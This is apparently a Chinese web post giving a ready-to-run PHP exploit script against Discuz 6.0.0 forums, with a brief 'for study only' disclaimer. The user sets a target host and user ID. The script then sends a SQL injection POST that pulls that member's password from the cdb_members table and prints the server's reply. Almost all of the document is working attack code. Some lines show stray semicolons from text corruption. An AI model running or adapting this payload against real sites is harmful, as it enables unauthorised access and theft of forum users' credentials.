杜工版discuz6.0.0漏洞利用脚本
学习研究技术用，切勿用于非法用途
修改域名和要破解的用户uid后，运行查看输出内容中是否有密码，如果没有说明论坛漏洞已经被修复
代码如下：

error_reporting(E_ALL&E;_NOTICE);
/*杜工版discuz6.0.0漏洞利用脚本*/
/*学习研究技术用，切勿用于非法用途*/
$host = "www.xxx.com";
$path = "forum/";
$port = 80;
$uid = 1;
$content = "action=search&searchid;=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" . $uid . "/*&do;=submit";

$data = "POST /" . $path . "/index.php" . " HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: " . $host . "\r\n";
$data .= "Content-length: " . strlen($content) . "\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content . "\r\n\r\n";
$ock = fsockopen($host, $port);
if (!$ock) {
	echo 'No response from ' . $host . "\n";;
	die;
} 
fwrite($ock, $data);
while (!feof($ock)) {
	echo fgets($ock, 1024);
}